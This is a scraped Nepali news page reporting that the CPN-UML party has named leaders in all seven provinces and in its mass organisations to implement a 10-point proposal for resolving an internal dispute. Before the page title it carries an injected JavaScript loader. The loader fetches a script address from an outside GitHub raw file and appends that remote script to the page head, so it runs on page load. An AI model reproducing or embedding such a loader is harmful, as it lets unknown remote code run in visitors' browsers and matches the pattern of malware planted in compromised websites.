;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); एमालेले तोक्यो सातै प्रदेशमा यी नेताहरूलाई यस्तो जिम्मेवारी, नामावलीसहित हेर्नुहोस – जुनेली न्युज
सोमवार, बैशाख ९, २०८२
  • होमपेज
  • एमालेले तोक्यो सातै प्रदेशमा यी नेताहरूलाई यस्तो जिम्मेवारी, नामावलीसहित हेर्नुहोस
Breaking News

एमालेले तोक्यो सातै प्रदेशमा यी नेताहरूलाई यस्तो जिम्मेवारी, नामावलीसहित हेर्नुहोस

जुनेली न्यूज, काठमाण्डौ | नेकपा एमालेले पार्टी विवाद समाधानका लागि कार्यदलले तयार गरेको १० बुँदे प्रस्ताव कार्यान्वयनको लागि सातवटै प्रदेशमा जिम्मेवारी तोकेर अन्तरपार्टी निर्देशन जारी गरेको छ ।

एमालेले भदौ ८ गतेको स्थायी कमिटी बैठक र १० गतेको केन्द्रीय कमिटी बैठकको निर्णय उल्लेख गरेर अन्तरपार्टी निर्देशन जारी गरेको हो ।पार्टी अध्यक्ष केपी शर्मा ओलीले जारी गरेको अपानिमा पार्टीको सबै तहमा १० बुँदे प्रस्ताव कार्यान्वयनलाई महत्त्वका साथ उल्लेख गरिएको छ |

प्रदेश जिल्ला र मातहतका कमिटीहरू र जनसंगठनहरूमा १० बुँदे कार्यान्वयनको लागि सहजीकरण गर्न जिम्मेवारी तोकिएको छ । जसमा लाई १० बुँदे कार्यान्वयनको जिम्मेवारीमा निम्न व्यक्ति तोकिएको छ :
प्रदेश १ – भीमप्रसाद आचार्य, सुुवासचन्द्र नेम्वाङ, शेरधन राई, देवराज घिमिरे र टंक आङ्बोहाङ

प्रदेश २- सत्यनारायण मण्डल, रघुवीर महासेठ, प्रभु साह, सुमन प्याकुरेल र ज्वालाकुमारी साह
बागमती प्रदेश- अष्टलक्ष्मी शाक्य, रामबहादुर थापा, काशीनाथ अधिकारी र आनन्द पोखरेल

गण्डकी प्रदेश- किरण गुरूङ, पृथ्वीसुब्बा गुरूङ, जगत विश्वकर्मा, लीलबहादुर थापा ।
लुम्बिनी प्रदेश- विष्णुप्रसाद पौडेल, शंकर पोखरेल, टोपबहादुर रायमाझी, दलबहादुर राना र लीला गिरि

कर्णाली प्रदेश- युवराज ज्ञवाली, यामलाल कँडेल, गोरख बोगटी र धर्मराज रेग्मी
सुदूरपश्चिम प्रदेश- भीमबहादुर रावल, लेखराज भट्ट र कर्णबहादुर थापा

त्यसै गरी जनसंगठनहरूमा ईश्वर पोखरेल, विष्णु पौडेल, गोकर्ण विष्ट र टोपबहादुर रायमाझीलाई १० बुँदे प्रस्ताव कार्यान्वयन गर्न जिम्मेवारी तोकिएको अपानिमा उल्लेख छ ।

एमालेको समस्या समाधानको लागि १० बुँदे कार्यान्वयन गर्दा उत्पन्न हुन सक्ने समस्या समाधान गर्न, केन्द्रीय कमिटीमा सदस्य मनोनयन गर्न, केन्द्रीय निकाय तथा विभागहरूलाई पूर्णता दिने सम्बन्धमा गृहकार्य गर्न भीम रावल, ईश्वर पोखरेल, विष्णु पौडेल, घनश्याम भुषाल, सुरेन्द्र पाण्डे र लेखराज भट्टलाई जिम्मेवारी दिने निर्णय स्थायी र केन्द्रीय कमिटीको बैठकले गरेको थियो ।

 

फेसबुक प्रतिक्रियाहरु